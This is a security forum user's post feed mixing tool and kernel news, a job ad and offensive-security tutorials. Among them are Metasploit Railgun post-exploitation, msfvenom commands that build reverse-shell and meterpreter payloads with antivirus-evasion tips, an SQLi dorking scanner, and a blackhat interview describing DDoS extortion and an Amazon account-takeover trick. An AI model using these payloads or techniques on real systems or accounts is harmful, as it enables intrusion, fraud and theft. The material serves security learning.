Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro

    WinObjEx64

    Nytro posted a topic in Programe utile

    WinObjEx64 Windows Object Explorer 64-bit WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights. System Requirements WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP, Windows Vista is partially supported. We have no plans of their full support. In order to use all program features Windows must be booted in the DEBUG mode. Build WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. Authors © 2015 WinObjEx64 Project Original WinObjEx © 2003 - 2005 Four-F Sursa: https://github.com/hfiref0x/WinObjEx64
  2. Nytro
    Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching The 3.x branch of the Linux kernel has been dropped After letting users decide the version numbering of the Linux kernel software, as Softpedia reported two weeks ago based on the Linus Torvalds’ Google+ poll for Linux kernel 3.20/4.0, the time has come for a change, as Linus Torvalds was proud to announce today the immediate availability for testing of the first RC (Release Candidate) version of the forthcoming Linux 4.0 kernel. This RC1 version is the first development release of what will become Linux kernel 4.0 in approximately 3-4 months. The final version of Linux kernel 4.0 will most probably arrive until summer 2015, when every kernel maintainer will go on vacation. However, Linus Torvalds tries to assure people that a version number change won’t bring any major features or break compatibility with previous releases. “Because the people have spoken, and while most of it was complete gibberish, numbers don't lie. People preferred 4.0, and 4.0 it shall be. Unless somebody can come up with a good argument against it. On the other hand, the strongest argument for some people advocating 4.0 seems to have been a wish to see 4.1.15 - because ‘that was the version of Linux skynet used for the T-800 terminator,’” says Linus Torvalds in the mailing list announcement. Live patching will be implemente d in the final release of Linux kernel 4.0 Without further ado, you can download the Linux kernel 4.0 RC1 right now via Softpedia or directly from the kernel.org website, whichever suits you best. We remind you that it’s an unstable version that should not be installed on production machines. According to Linus Torvalds’ notes, it is a fairly small release, but not much smaller than the usual RC versions. Prominent features include various vm cleanups, and the unification of the PROTNONE and NUMA handling for page tables. The final release of Linux kernel 4.0 will also include the highly anticipated live patching infrastructure. By Marius Nestor Sursa: Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching - Softpedia
  3. Nytro
    Senior PHP & MySQL Developer Knowledge and Skills • Medium/Advanced knowledge of PHP & MySQL; • Medium/Advanced knowledge of XHTML, CSS, JS, XML, CSS & HTML, AJAX; • Medium/Advanced knowledge of OOP programming; • Capacity to understand and adapt quickly to the working model of some complex and mature applications; • Experience in developing web applications; • Ability to create a flexible design and capacity to write a well-structured code; • Talented and fast learner; • Reliable, loyal, motivated and ambitious, ready for long term collaboration; Responsibilities •You will develop and expand our product platform, along with your colleagues; •You will work on long-term running projects for our clients; The following represent an advantage • University education in Computer Science, Informatics, Engineering, Cybernetics; • Experience with SVN versioning system; • Knowledge of the required methods of working with Smarty; • Be thorough, have good attention to detail and display a high level of accuracy; • Strong analytical, creative thinking; Job benefits • Open minded team of highly skilled colleagues • Modern environment, office building, downtown location • Attractive financial and benefits package • Relaxation at dcs plus lounge together with colleagues and friends – bar, cinema, chill out area, billiards, ping-pong, darts, food court • Other benefits: fruits and coffee on the house, medical insurance, teambuildings Detalii la @Cheater
  4. Nytro
    (Inca) Nu stiu Python, dar intra din browser pe: "site . com /interface/ipsconnect/ipsconnect.php ?" si vezi ce raspuns primesti.
  5. Nytro

    Raiffesen Bank

    Nytro replied to B10S's topic in Discutii non-IT

    Depinde ce servicii ai activate: - comision de administrare ~ 3-4 RON - Internet banking ~ 3-4 RON - alerte SMS ~ 3-4 RON
  6. Nytro
    [TABLE] [TR] [TD]Hyperion-1.2.zip[/TD] [TD] [/TD] [/TR] [TR] [TD=width: 130]Description:[/TD] [TD] Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". [/TD] [/TR] [TR] [TD]MD5:[/TD] [TD]dc31d022b124dc92e7c362a62e64bd46[/TD] [/TR] [TR] [TD]Author:[/TD] [TD]belial[/TD] [/TR] [/TABLE] Sursa: nullsecurity
  7. Nytro
    exrs Exercises for learning Reverse Engineering and Exploitation. All binaries for these challenges are ELF 64-bit LSB executable, x86-64. reverse engineering The goal is to run the chalenges like this ./rX password and having them print out password OK. It's reverse engineering, not cracking. So don't patch the binnaries if you want to play by the rules. It gets really borring if you don't anyway. sploit All the sploit exercices are designed to be solvable with NX+ASLR without being dependant on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service, argv & env is not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun! Link: https://github.com/wapiflapi/exrs
  8. Nytro
    Accessing the Windows API Directly February 19, 2015 Accessing the Windows API Directly If you are into pentesting I am sure you might have heard about the IRB shell in the Metasploit framework. This will be a small post about accessing Windows API using Railgun. Using Railgun we can access different functions in DLLs during runtime in memory. We could also write our own DLLs and call them directly using Railgun. This technique is used in the Meterpreter scripts and post exploitation modules to access the API to perform automated tasks. For demonstration I will be using a Windows 7 machine as the target and Kali as the attacker machine. After owning the box in the meterpreter session type “irb” and from there we can start the interactive ruby shell. The “client” will be our meterpreter client. We can access common API calls like this. Suppose I want to get the system information. [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]client.sys.config.sysinfo [/TD] [/TR] [/TABLE] Get the user ID [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]client.sys.config.getuid [/TD] [/TR] [/TABLE] Get all network interfaces. To verify the return type of the object type .class at the end. In this case it’s an array. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]init = client.net.config.interfaces init.each { |x| puts x.pretty } [/TD] [/TR] [/TABLE] The above are built-in calls. Using Railgun we can access the Windows API directly. The syntax would be. Client.railgun.(DLL).(function)(arg 1, arg 2, …) I will demonstrate some examples. So suppose I want to access the MessageBox function in the Windows API. It’s located in the “user32” DLL. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]int WINAPI MessageBox ( _In_opt_ HWND hWnd, _In_opt_ LPCTSTR lpText, _In_opt_ LPCTSTR lpCaption, _In_ UINT uType ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx To call the function we can type: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]?> client.railgun.user32.MessageBoxA(0, "Hello World", "Osanda", "MB_ICONASTERISK | MB_OK" ) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1} [/TD] [/TR] [/TABLE] If you want to lock the workstation you could use “LockWorkStation” API. BOOL WINAPI LockWorkStation(void); https://msdn.microsoft.com/en-us/library/windows/desktop/aa376875%28v=vs.85%29.aspx [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]?> client.railgun.user32.LockWorkStation() => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true} [/TD] [/TR] [/TABLE] Suppose I want to terminate a process. For that I will be using the “OpenProcess” and “TerminateProcess” functions. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]HANDLE WINAPI OpenProcess( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ DWORD dwProcessId ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/ms684320%28v=vs.85%29.aspx [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]BOOL WINAPI TerminateProcess( _In_ HANDLE hProcess, _In_ UINT uExitCode ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/ms686714%28v=vs.85%29.aspx If I want to terminate the CMD running in the target machine. I’ll first get the handle to “PROCESS_TERMINATE” and store the return value in a variable and next call “TerminateProcess” API to terminate the process. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]?> client.railgun.kernel32.OpenProcess("PROCESS_TERMINATE", false, 3664) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>4692} >> phandle = _['return'] => 4692 >> client.railgun.kernel32.TerminateProcess(phandle, 0) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true} >> [/TD] [/TR] [/TABLE] Likewise you could do cool stuff by directly accessing the API during runtime. Read the prototype of the function and apply accordingly using Railgun. If you want to find the functions loaded to Railgun in a specific DLL just get the exception error message and you will see the functions loaded. Now let’s try to add a new DLL which is not shipped by default into Railgun. To check the available DLL type. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]?> client.railgun.known_dll_names => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"] >> [/TD] [/TR] [/TABLE] Let’s try to add “mpr.dll” into Railgun at runtime and try to access a function. This would be the syntax. client.railgun.add_dll(Name, Path) To add “mpr.dll” we can enter like this: client.railgun.add_dll("mpr", "C:/windows/system32/mpr.dll") After that you should add the function. To view the functions of a DLL I will be using DLL Export Viewer by Nirsoft, feel free to use any utility you like. I would like to use the “WNetGetUserW” function. Let’s check the function from MSDN. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]DWORD WNetGetUser( _In_ LPCTSTR lpName, _Out_ LPTSTR lpUserName, _Inout_ LPDWORD lpnLength ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/aa385476%28v=vs.85%29.aspx We should follow the syntax of the Railgun. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]client.railgun.add_function("mpr", "WNetGetUserW", "DWORD", [ ["PWCHAR", "lpName", "in"], ["PWCHAR", "lpUserName", "out"], ["PDWORD", "lpnLength", "inout"] ]) [/TD] [/TR] [/TABLE] After adding the function we can run the function passing the arguments [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]>> client.railgun.mpr.WNetGetUserW(nil,50,50) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>0, "username"=>"SYSTEM\x00AAAAAAAAAAAAAAAAAA", "lplen"=>50} [/TD] [/TR] [/TABLE] That is how you can access the Windows API using Railgun. For more info about editing modules read their documentation https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation MSDN is your friend. To play around with different APIs apply according to information provided by MSDN. Thanks for reading. Posted by Osanda Malith in pentesting Sursa: https://osandamalith.wordpress.com/2015/02/19/accessing-the-windows-api-directly/
  9. Nytro
    [h=1]SystemProgramming[/h] Welcome to Angrave's crowd-sourced System Programming wiki! This wiki is being built by students and faculty from UIUC. Rather than requiring a book this semester, we will build our own set of resources here. [h=2]Week 1[/h] C Programming, Part 1: Introduction C Programming, Part 2: Text Input And Output Informal Glossary of basic terms #Piazza: When And How to Ask For Help [h=2]Week 2[/h] C Programming, Part 3: Common Gotchas Forking, Part 1: Introduction Forking, Part 2: Fork, Exec, Wait Kill [h=2]Week 3[/h] Memory, Part 1: Heap Memory Introduction Memory, Part 2: Implementing a Memory Allocator Memory, Part 3: Smashing the Stack Example Pthreads, Part 1: Introduction [h=2]Week 4[/h] Pthreads, Part 2: Usage in Practice Synchronization, Part 1: Mutex Locks Synchronization, Part 2: Counting Semaphores [h=2]Week 5[/h] Synchronization, Part 3: Working with Mutexes And Semaphores Synchronization, Part 4: The Critical Section Problem Synchronization, Part 5: Condition Variables [h=2]Week 6[/h] Synchronization, Part 6: Implementing a barrier Synchronization, Part 7: The Reader Writer Problem Synchronization, Part 8: Ring Buffer Example Synchronization, Part 9: The Reader Writer Problem (part 2) [h=2]Week 7[/h] Deadlock, Part 1: Resource Allocation Graph Deadlock, Part 2: Deadlock Conditions [h=2]Week 8[/h] Todo Analysis of Dining Philosophers (for now see the discussion section handout) ** Breaking Circular Wait. Using a global mutex to break hold-and-wait ** Beware of starvation if all philosophers hold their left chopstick and try+release their right chopstick Virtual Memory, Part 1: Introduction to Virtual Memory Pipes, Part 1: Introduction to pipes Pipes, Part 2: Pipe programming secrets Files, Part 1: Working with files [h=2]Week 9[/h] POSIX, Part 1: Error handling Networking, Part 1: Introduction Networking, Part 2: Using getaddrinfo Networking, Part 3: Building a simple TCP Client Programming Tricks, Part 1 [h=2]Week 10[/h] Networking, Part 4: Building a simple TCP Server Networking, Part 5: Reusing ports Scheduling, Part 1: Scheduling Processes [h=2]Week 11[/h] File System, Part 1: Introduction File System, Part 2: Files are inodes (everything else is just data...) File System, Part 3: Permissions [h=2]Week 12[/h] File System, Part 4: Working with directories File System, Part 5: Virtual file systems File System, Part 6: Memory mapped files and Shared memory File System, Part 7: Scalable and Reliable Filesystems Networking, Part 6: Creating a UDP server [h=2]Week 13[/h] Signals, Part 2: Pending Signals and Signal Masks Signals, Part 3: Raising signals Signals, Part 4: Sigaction [h=2]Week 14[/h] File System, Part 8: Disk blocks example [h=2]Other content[/h] C Programming, Part 4: Debugging #Example Markdown Legal and Licensing information: Unless otherwise specified, submitted content to the wiki must be original work (including text, java code, and media) and you provide this material under a Creative Commons License. If you are not the copyright holder, please give proper attribution and credit to existing content and ensure that you have license to include the materials. Sursa: https://github.com/angrave/SystemProgramming/wiki
  10. Nytro
    Cititi ce e scris cu rosu.
  11. Nytro
    Ceva de genul. Nu stiu unde se face diferenta. Cei cu FinFisher sunt bogati si liberi. NSA la fel. Legile ar trebui sa fie la fel pentru toti.
  12. Nytro
    Are ban permanent. Puteti discuta cu el la adresa thesevensmarter@gmail.com
  13. Nytro
    Interview With A Blackhat (Part 1) [This interview openly discusses criminal activities from the perspective of an admitted criminal. You may find this content distressing, even offensive, but what is described in this interview is real. We know from personal experience is that these activities are happening on websites everywhere, everyday, and perhaps even on your websites. WhiteHat Security brings this information to light for the sole purpose of assisting those who want to protect themselves on their online business.] Over the last few years, I have made myself available to be an ear for the ‘blackhat community.’ The blackhat community, often referred to as the internet underground, is a label describing those participating on the other side of the [cyber] law, who willingly break online terms of service and software licensing agreements, who may trade in warez, exploits, botnets, credit card numbers, social security numbers, stolen account credentials, and so on. For these individuals, or groups of them, there is often a profit motive, but certainly not always. Most of the time, the people I speak with in the information security industry understand the usefulness of engaging in dialog with the underground — even if it’s not something they feel comfortable doing themselves. However, I occasionally get questioned as to the rationale — the implication being that if you play with pigs you start to stink. People sometimes even begin to insinuate that one must be bad to know bad people. I think it is incredibly important for security experts to have open dialogues with the blackhat community. It’s not at all dissimilar to police officers talking with drug dealers on a regular basis as part of their job: if you don’t know your adversary you are almost certainly doomed to failure. One ‘blackhat,’ who asked to be called Adam, that I have spoken to a lot has recently said he’s decided to go legit. During this life-changing transition, he offered to give an interview so that the rest of the security community could learn from his point of view. Not every blackhat wants to talk, for obvious reasons, so this is a rare opportunity to see the world through his eyes, even if we’re unable to verify any of the claims made. Hopefully by learning how Adam and other blackhats like him think, how they communicate, people can devise better solutions, abandon failed technologies, and fix the most glaring issues. Maybe people reading this can find more effective punishments to deter the criminal behavior before it happens, or ruin the incentives, disable the markets, or find ways to keep people from the allure of criminal activity in the first place. A great deal can be unearthed by examining Adam’s words and those of other blackhats like him. Or maybe we can entice some of them, like this individual, to leave the blackhat life behind completely. Adam’s interview took place over a few days, and required a lot of back and forth. Due to the way in which this interview had to take place, a lot of editing was required to make it readable, but primarily to spelling, capitalization and punctuation. In every meaningful sense, these are Adam’s unaltered words. (Note that when Adam refers to “whitehats,” he is referring to legitimate hackers in general, and that this should not be confused with WhiteHat Security the business.) This is the first of our three-part interview. The next post will be tomorrow. Q: Can you describe what you think your hacking/security related skills are? A: My personal expertise and area of knowledge is in social engineering. I think it is pretty obvious I’m a blackhat, so I social engineer to card. Another area of “hacking” (I use the ” as DDoS isn’t really hacking) is botnet building and takedown orders. This is where most money in my opinion is made — where one day can bring in several thousand dollars. The whole blackhat market has moved from manual spreading to fully automated software. In addition, many sites are targeted in malware/info leaks by using some really common and easy methods. These include SQLi, basic and advanced XSS, CSRF, and DNS cache poisoning. Although SQLi is still a big player, XSS has taken over the market. I estimate about 50-60% of the attacks my crew did last year (Jan 1st-Jan 1st) were XSS. I also learned several programming languages — Python, Perl, C, C++, C#, Ruby, SQL, PHP, ASP, just to name a few. Q: Can you describe the first time you remember deliberately breaking a computer-related law? Why did you do it and how did you justify it? A: Hmmmmm. That was many years ago. The first time I remember was when I was in school (aged about 14). The admins were pretty good at security (for school admins, bear in mind). I was in the library one day and I knew that the admins had remote access to every PC. I also knew the librarian did. The library just so happened to be the place where they marked our exam papers and entered the grades. I was never the genius at school but I was getting mediocre grades. What if I could get ‘A’s and ‘A+’s and not do half the work? So I started to read around. I eventually came across keyloggers. It seemed strange and amazing that a program I could make (with a little research) could get me the top grades. So I did it. I installed the keylogger onto the librarian’s PC and then used the remote administration program to download the file onto the other PCs. I was suspended for two weeks. Q: Where did you learn the bulk of your skills? A: Books, Google, and the people I began speaking with on irc/forums. Unlike today’s 1337 haxorz (lol) we all shared, spoke, and helped each other. There wasn’t a sense of being mocked because you didn’t know. Q: What attracted you to the blackhat way of life? A: Money. I found it funny how watching tv and typing on my laptop would earn me a hard worker’s monthly wage in a few hours. [it was] too easy in fact. Q: Can you recall a tipping point at which you started considering yourself a blackhat? What was the nature of the event? A: It’s difficult really. I and the guys/girls I hung with never called ourselves blackhats, I don’t know, it was just too James Bond like. We just saw ourselves as people who found a way to make money. We didn’t care about what category we were in. It was just easy and funny. Although saying that, I first realized I might be branded a blackhat when my “real life” friend became a victim of credit card fraud. That’s when I realized my actions had real victims and not just numbers that were worth money. Q: How many machines do you think you directly controlled at the peak of your botnet activity? A: Erm, depends. I had two separate botnets (although some bots cross over). The DDoS botnet contained the bots which were public computers or computers that were in offices. [There were] two reasons I did that. Either: 1. they are on for the majority of the day and have good connection speeds or 2. people weren’t stupid enough to do their banking on them (if you were I’d let a script kiddy have it). Then there was my carding botnet, definitely the most valuable. These were PCs of banks, estate agents, supermarkets and obviously home PCs. I preferred to target PCs where an employee would enter customer data, i.e. banks (yes banks are super easy to bot). This gave me a constant supply of credit cards and a never-ending amount of spam ammo. DDoS botnet has about 60-70k bots at the moment, most in the west. Carding botnet had a lot less at around 5-10k, most in Asia. 570k is the biggest I’ve controlled. Q: How much money do you think you made after expenses per year at your peak doing blackhat activities? A: I can’t really go into specifics but when 9/11 happened we were making millions. Q: And how much do you think you made last year? A: Off the top of my head? Around about 400-500k. Last year was kind of shit. People became wiser, patches became more frequent. This year we have 3/4 of that amount already. Q: When you started, did you have a goal in mind to make a certain amount of money or achieve a certain goal? A: I get asked this a lot by new people on the forums. I never set myself goals until probably in the last 4 years. I started it out just for easy laughs, bragging rights (lol) and easy, very easy money. Q: Can you describe the process that you use to make money with your botnet? A: Making money with a botnet is easier than brushing your teeth, especially if you’re in the automated industry. Any crew has several members. The bot master, researcher, reverse engineer, spreader, social engineer, sales man and fudder*. The people who sell 0-days are solely selling 0-days half the time. The buyers are bot masters without a crew. Our crew developed a tool that checks the bot’s cache for Facebook/twitter accounts then checks their Facebook interests (e.g. justin bieber), then age, name, location. So for example bot no. 2 is signed into Facebook. The account likes Justin Bieber, aged 14, female, and lives in America (important to get correct language). Then automatically it selects a pre made list of links and for example would choose the ‘Justin bieber sex tape video’. Using zero days to compromise a website, then insert an iframe is kinda old, boring and sometimes doesn’t bring in the best results — unless of course you’re hijacking a high Alexa rating; then it’s worth it. Combining 0-days to deface the website and then a 0-day in e.g. java to hijack with a drive by is a lot more effective than tracking the user into downloading a file. What a lot of people don’t realize is that emails easily available on their Facebook profile can be sold for spam. Again, this makes more money automatically. * A fudder can be a tool that binds to a virus and makes it more difficult for antivirus to detect, or a person specializing in such a tool. Q: How easy is it for you to compromise a website and take control over it? A: For beginners you can simply Google inurl:money.php?id= — go ahead try it. But most of them will be cancelled or dried up. So, now you target bigger websites. I like to watch the news; especially the financial side of it. Say if a target just started up and it suddenly sky rocketed in online sales that’ll become a target. Most of these websites have admins behind them who have no practical experience of being the bad guy and how the bad guys think. This leaves them hugely vulnerable. They patch SQL but choose a DNS that is vulnerable to DNS cache poisoning. You can break in and be gone within an hour. Q: How easy is it for you to take over the ownership of an account via whois information or other publicly available information? A: Whois used to be crucial to gaining information. Now people spew it on Facebook, twitter, etc. Companies like Amazon only require name, address and email on the account to add another credit card. You then hang up. Ring the password reset department and tell them as verification the name, address, email and the credit card number you just added (it doesn’t even have to work (lol), just use fakenamegenerator.com) and then you are in. You can now see the ‘legit’ credit card’s last 4 digits. Now you can get an email password reset and you’re in. Amazon says they patched this two years ago but I use this method all the time. Seriously Amazon, train your staff. Q: What is your favorite kind of website to compromise? Or are your hack attempts entirely untargeted? What are the easiest sites to monetize? A: Most of the time un-targeted but once a company (which I won’t name) pissed me off for not giving me discount in a sale so we leaked every single credit card number online. One type of company I love to target is Internet security, i.e. anti virus companies. There is nothing better than a clothing store at the summer sales (except porn websites). These are in my personal opinion the easiest and most successful targets to breach. I’ll talk about clothes stores first. Clothing websites are SO easy because of two main types of attacks. 1. The admins never ever have two-step authentication. I don’t know why, but I have never seen one admin have it (and I’ve done it thousands of times). 2. The ‘admin’ usually works there behind the tills or in the offices. They have no clue what they’re doing: they just employ someone to make the website then they run it. They never ever have HTTPS, [so they have] huge SQLi vulnerabilities (e.g.. inurl: product.php?id=). Once you have the SQLi vulnerability you can go two routes or both. Route one: steal the credit card info and leave. Route two: deface the website, keep the original HTML code but install an iframe that redirects to a drive by download of a banking Trojan. Now to discuss my personal favourite: porn sites. One reason why this is so easy: The admins don’t check to see what the adverts redirect to. Upload an ad of a well-endowed girl typing on Facebook, someone clicks, it does a drive by download again. But this is where it’s different: if you want extra details (for extortion if they’re a business man) you can use SET to get the actual Facebook details which, again, can be used in social engineering. Q: What is your favorite/most effective exploit against websites and why? A: If it’s a 0-day, that obviously ranks at the top. But below that is XSS. It’s really well known but no one patches it. I suppose DDoS isn’t really classed as an exploit but that can bring in monthly ‘rent’ for our ‘protection’. But over all 0-days are the greatest exploits. Q: How do you monetize DDoS? A: People buy accounts so for example you rent 1k bots and have a DDoS time limit of 30 mins. Some people buy one-offs. Black mail is a huge part of it. Take the website down for an hour. Email them or call them and say they pay 200 dollars or it stays offline for good. They usually pay up. If they don’t, they lose days, weeks, months of business. Q: How do you pick targets to DDoS when you are attempting to extort them? A: Hmmm. It depends. If there is a big sporting event, e.g. the Super Bowl, I can guarantee 95% of bookies have been extorted. I knew of one group who took down cancer research website and extorted them after their race for life donation process was meant to start. They got their money, kinda sad really. Q: What kind of people tend to want to buy access to your botnet and/or what do you think they use it for? A: Some people say governments use it, rivals in business. To be honest, I don’t care. If you pay you get a service. Simple. Continue Reading Part 2 This entry was posted in Web Application Security on May 21, 2013 by Robert Hansen. Sursa: https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/
  14. Nytro
    netool.sh V4.4 MitM PENTESTING OPENSOURCE T00LKIT v4.4 WIKI netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and social engeneering attacks "[spear phishing attacks]"... DESCRIPTION "Scanning - Sniffing - Social Engeneering" Netool: its a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address. Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage. Recently was introduced "inurlbr" webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag --comand-vul) Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_' * STABLE repository | GIT repository | | CHANGELOG | BUG-REPORTS * Operative Systems Supported Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS Linux-backtrack (un-continued) | Mac osx (un-continued). "REMARK" The project 'opensource-kali' as build to work on most pentesting distros, like: blackbox,parrot,backtrack,kali,etc, with little configuration needed. Sutch as: install the toolkit in the rigth path, set executable permisions to all files, and config paths to dependencies (in "toolkit_config" file). so its the obvious choise if you desire to install the toolkit on a diferent distro (than ubuntu or kali). * UBUNTU install | KALI install | OTHER DISTROS install | UNIVERSAL INSTALLER * Dependencies "TOOLKIT DEPENDENCIES" zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip "SCANNER INURLBR.php" curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl * Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2 * Credits x0ra-machine "Pentesting Lab" | Apofis Kaizer "Debug on Mac OSx" Fyodor "Nmap" | ALoR & NaGa "Ettercap" | HD moore "Metasploit" Moxie M "Sslstrip" | Chris L "Driftnet" | j0rgan "Cupp.py" Cleiton p "inurlbr.php" | ReL1K "unicorn.py" "Develop by: pedr0 Ubuntu [r00t-3xp10it]" Suspicious Shell Activity Labs@2014 | r00tsect0r CyberTeam Red Team Collaborations Sursa: http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
  15. Nytro
    Custom payloads in Metasploit 4 One of the key features of Metasploit is the customization of the framework; for example, different payloads can be generated with many different options and placed in any of a large number of exploits. Custom scripts can be written with many commands for automated post-exploit actions. Nevertheless, there have still been a number of customizations that have been awkward to implement. Many of those deal with adding a payload that isn’t in the framework, or modifying it in a way that the framework does not directly support. So for Metasploit 4, I made a few tweaks to increase payload flexibility. Generic/custom The first change was an addition of a single custom payload. Prior to this, a custom payload existed for command execution exploits for UNIX (payload/cmd/unix/generic) but there was no analogous payload for command execution exploits for Windows, or for that matter any other architecture or platform. If you are developing a payload that could benefit from Metasploit integration, writing a payload module is preferable. But in some cases, such as generating multiple payloads, Metasploit might not currently support the UI or backend to generate the payload in a conventional way, and you may want to import the payload from a file or option. Or while writing a payload, it can be easier to import a payload into the framework than change a module. Multipayloads The second change made it easier to combine multiple payloads into one exploit, since you may not get a second chance to exploit your target service, get them to open an exploit document, etc. The first shot at allowing the framework to creating a single payload that is a combination of a number of payloads was the “none” exitfunc. Most payloads allow you to set the “EXITFUNC” option. This option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. Usually it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. I added a ‘none’ that calls GetLastError, effectively a no-op. The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial. msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=5555 EXITFUNC=none > pay.raw msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=4444 EXITFUNC=none >> pay.raw msfvenom -f exe -p - > msf.exe < pay.raw For some reason that didn't function in my XP vm, but it worked fine in my win7 VM. When the first reverse shell either failed or ran and the shell exited, the second reverse shell was started. Unfortunately this doesn't help you if the first freezes, but it's a start. Unfortunately the biggest problem is that many payloads don't have a clean execution path after the exitfunc. For example, the windows/exec payload places the exitfunc block before the command to be executed, so instead of running to the next payload, it tries to execute the ascii command as x86 instructions. This fails badly. Parallel multipayloads The solution is to enable running payloads in parallel, using roughly the same technique as in the exe payload injection code. That code injects a payload into an existing exe to run in a new thread while the old exe code continues to run normally. (-f option in msfvenom and msfencode) So now with the -c option, you can generate shellcode to be run in a new thread while the shellcode in the file specified by the -c option will be run in the main thread. And of course you can continue to add payloads to be run in parallel in subsequent commands. $ ruby msfvenom -h Usage: msfvenom [options] Options: ... -c, --add-code [path] Specify an additional win32 shellcode file to include -x, --template [path] Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread ... $ ruby msfvenom -p windows/messagebox -f raw EXITFUNC=thread > /tmp/msgbox.raw $ ruby msfvenom -p windows/meterpreter/reverse_tcp -f exe -c /tmp/msgbox.raw LHOST=192.168.0.102 EXITFUNC=thread > /tmp/rev102msgbox.exe This code generates an executable that runs a messagebox payload in one thread while a reverse-connect meterpreter is spawned in another thread. Custom executables The last change came in response to a number of requests to use a custom executable in the psexec exploit that generates and drops an executable onto the target system to execute. Since some antivirus products will block metasploit generated exe's, yet it is not difficult to manually generate an undetected executable, it makes sense to allow exploits like psexec to use an external exe as the payload. This change was implemented in the exe mixin used by executable-dropping exploits, and so is available in all similar exploits as well. The option is the advanced option EXE::Custom. , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v4.0.1-dev [core:4.0 api:1.0] + -- --=[ 725 exploits - 367 auxiliary - 78 post + -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13559 updated today (2011.08.14) msf > use exploit/windows/smb/psexec msf exploit(psexec) > set EXE::Custom /tmp/mypayload.exe EXE::Custom => /tmp/mypayload.exe ... and proceed normally, without being bothered by pesky antivirus. Sursa: Custom payloads in Metasploit 4 « Thoughts on Security
  16. Nytro
